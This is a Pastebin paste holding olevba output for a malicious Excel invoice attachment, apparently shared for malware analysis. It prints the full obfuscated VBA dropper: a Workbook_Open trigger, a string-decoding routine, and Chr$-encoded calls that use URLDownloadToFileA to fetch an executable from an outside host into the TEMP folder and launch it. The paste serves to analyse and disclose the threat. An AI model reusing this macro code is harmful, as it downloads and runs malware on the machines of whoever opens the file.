SHARE
TWEET

Malicious Excel macro

dynamoo Mar 11th, 2015 269 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS---- inv86-~1.xls
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: inv86-~1.xls
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ÝòàÊíèãà.cls
  13. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub Workbook_Open()
  16. atqk_x482mp6v
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+---------------+----------------------------------------+
  21. | Type     | Keyword       | Description                            |
  22. +----------+---------------+----------------------------------------+
  23. | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
  24. +----------+---------------+----------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO Ëèñò1.cls
  27. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29. (empty macro)
  30. -------------------------------------------------------------------------------
  31. VBA MACRO Ëèñò2.cls
  32. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34. (empty macro)
  35. -------------------------------------------------------------------------------
  36. VBA MACRO Ëèñò3.cls
  37. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  38. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  39. (empty macro)
  40. -------------------------------------------------------------------------------
  41. VBA MACRO Class1.cls
  42. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
  43. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  44. (empty macro)
  45. -------------------------------------------------------------------------------
  46. VBA MACRO Class2.cls
  47. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class2'
  48. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  49. (empty macro)
  50. -------------------------------------------------------------------------------
  51. VBA MACRO ÀàâïàâïÀÀ.bas
  52. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u0410\u0430\u0432\u043f\u0430\u0432\u043f\u0410\u0410'
  53. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  54.  
  55. Public Function tIBlTVqSYlvQeRDfBAc(VdkAbaqgjbz As String) As String
  56. For HFncwnerBk = 1 To Len(VdkAbaqgjbz) Step 2
  57. tIBlTVqSYlvQeRDfBAc = tIBlTVqSYlvQeRDfBAc & Mid(VdkAbaqgjbz, HFncwnerBk, 1)
  58. Next
  59. End Function
  60.  
  61. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  62. ANALYSIS:
  63. No suspicious keyword or IOC found.
  64. -------------------------------------------------------------------------------
  65. VBA MACRO Class3.cls
  66. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class3'
  67. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  68. (empty macro)
  69. -------------------------------------------------------------------------------
  70. VBA MACRO Class4.cls
  71. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class4'
  72. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  73. (empty macro)
  74. -------------------------------------------------------------------------------
  75. VBA MACRO Class5.cls
  76. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class5'
  77. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  78. (empty macro)
  79. -------------------------------------------------------------------------------
  80. VBA MACRO ûâàûâÀÀâà.bas
  81. in file: inv86-~1.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u044b\u0432\u0430\u044b\u0432\u0410\u0410\u0432\u0430'
  82. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  83. #If VBA7 Then
  84.     Private Declare PtrSafe Function ãøÏÍØûâàà Lib "urlmon" Alias _
  85.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
  86.     ByVal ÏÑðïñïñïïÎàï As String, _
  87.     ByVal ÏÑðïñïñïïÎàïf As String, _
  88.     ByVal ÏÑðïñïñïïÎàïfd As Long, _
  89.     ByVal ÏÑðïñïñïïÎàïfds As LongPtr) As LongPtr
  90. #Else
  91.     Private Declare Function ãøÏÍØûâàà Lib "urlmon" Alias _
  92.     "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
  93.     ByVal ÏÑðïñïñïïÎàï As String, _
  94.     ByVal ÏÑðïñïñïïÎàïf As String, _
  95.     ByVal ÏÑðïñïñïïÎàïfd As Long, _
  96.     ByVal ÏÑðïñïñïïÎàïfds As Long) As Long
  97. #End If
  98. Sub atqk_x482mp6v()
  99. ðïîðïÀàâïàâï tIBlTVqSYlvQeRDfBAc(Chr$(104) & Chr$(43) & Chr$(116) & Chr$(83) & Chr$(116) & Chr$(38) & Chr$(112) & Chr$(47) & Chr$(58) & Chr$(73) & Chr$(47) & Chr$(93) & Chr$(47) & Chr$(134) & Chr$(48) & Chr$(60) & Chr$(51) & Chr$(35) & Chr$(52) & Chr$(109) & Chr$(48) & Chr$(61) & Chr$(52) & Chr$(104) & Chr$(101) & Chr$(102) & Chr$(98) & Chr$(56) & Chr$(46) & Chr$(120) & Chr$(110) & Chr$(54) & Chr$(101) & Chr$(126) & Chr$(116) & Chr$(134) & Chr$(115) & Chr$(84) & Chr$(111) & Chr$(35) & Chr$(108) & Chr$(56) & Chr$(104) & Chr$(45) & Chr$(111) & Chr$(80) & Chr$(115) & Chr$(74) & Chr$(116) & Chr$(118) & Chr$(46) & Chr$(60) & Chr$(99) & Chr$(107) & Chr$(111) & Chr$(92) & Chr$(109) & Chr$(84) & Chr$(47) & Chr$(107) & Chr$(106) & Chr$(40) & Chr$(115) & Chr$(68) & Chr$(47) & Chr$(109) & Chr$(98) & Chr$(86) & Chr$(105) & Chr$(104) & Chr$(110) & Chr$(49) & Chr$(46) & Chr$(39) & Chr$(101) _
  100. & Chr$(96) & Chr$(120) & Chr$(99) & Chr$(101) & Chr$(62)), Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(96) & Chr$(77) & Chr$( _
  101. 109) & Chr$(80) & Chr$(123))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(81) & Chr$(102) & Chr$(106) & Chr$(74) & Chr$(105) & Chr$(67) & Chr$(36) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(48) & Chr$(102) & Chr$(132) & Chr$(103) & Chr$(80) & Chr$(68) & Chr$(109) & Chr$(54) & Chr$(95) & Chr$(55) & Chr$(65) & Chr$(53) & Chr$(130) & Chr$(101) & Chr$(134) & Chr$(68) & Chr$(74) & Chr$(84) & Chr$(129) & Chr$(85) & Chr$(37) & Chr$(46) & Chr$(64) & Chr$(101) & Chr$(57) & Chr$(120) & Chr$(124) & Chr$(101) & Chr$(50))
  102.  
  103.  
  104. End Sub
  105. Function ðïîðïÀàâïàâï(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
  106. ïëðïÀÀàâïï = ãøÏÍØûâàà(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
  107. Set ûâàÀÀâûàûâà = CreateObject(tIBlTVqSYlvQeRDfBAc(Chr$(83) & Chr$(99) & Chr$(104) & Chr$(99) & Chr$(101) & Chr$(52) & Chr$(108) & Chr$(68) & Chr$(108) & Chr$(92) & Chr$(46) & Chr$(46) & Chr$(65) & Chr$(84) & Chr$(112) & Chr$(44) & Chr$(112) & Chr$(91) & Chr$(108) & Chr$(125) & Chr$(105) & Chr$(75) & Chr$(99) & Chr$(125) & Chr$(97) & Chr$(47) & Chr$(116) & Chr$(35) & Chr$(105) & Chr$(71) & Chr$(111) & Chr$(38) & Chr$(110) & Chr$(82)))
  108.  
  109. ûâàÀÀâûàûâà.Open Environ(tIBlTVqSYlvQeRDfBAc(Chr$(84) & Chr$(51) & Chr$(77) & Chr$(71) & Chr$(80) & Chr$(83))) & tIBlTVqSYlvQeRDfBAc(Chr$(92) & Chr$(75) & Chr$(102) & Chr$(98) & Chr$(74) & Chr$(130) & Chr$(67) & Chr$(59) & Chr$(104) & Chr$(73) & Chr$(106) & Chr$(76) & Chr$(102) & Chr$(94) & Chr$(103) & Chr$(40) & Chr$(68) & Chr$(130) & Chr$(54) & Chr$(87) & Chr$(55) & Chr$(90) & Chr$(53) & Chr$(53) & Chr$(101) & Chr$(65) & Chr$(68) & Chr$(102) & Chr$(84) & Chr$(118) & Chr$(85) & Chr$(97) & Chr$(46) & Chr$(58) & Chr$(101) & Chr$(49) & Chr$(120) & Chr$(50) & Chr$(101) & Chr$(47))
  110. End Function
  111.  
  112.  
  113.  
  114.  
  115.  
  116. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  117. ANALYSIS:
  118. +------------+--------------------+-----------------------------------------+
  119. | Type       | Keyword            | Description                             |
  120. +------------+--------------------+-----------------------------------------+
  121. | Suspicious | CreateObject       | May create an OLE object                |
  122. | Suspicious | Lib                | May run code from a DLL                 |
  123. | Suspicious | Open               | May open a file                         |
  124. | Suspicious | Environ            | May read system environment variables   |
  125. | Suspicious | Chr                | May attempt to obfuscate specific       |
  126. |            |                    | strings                                 |
  127. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  128. +------------+--------------------+-----------------------------------------+
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top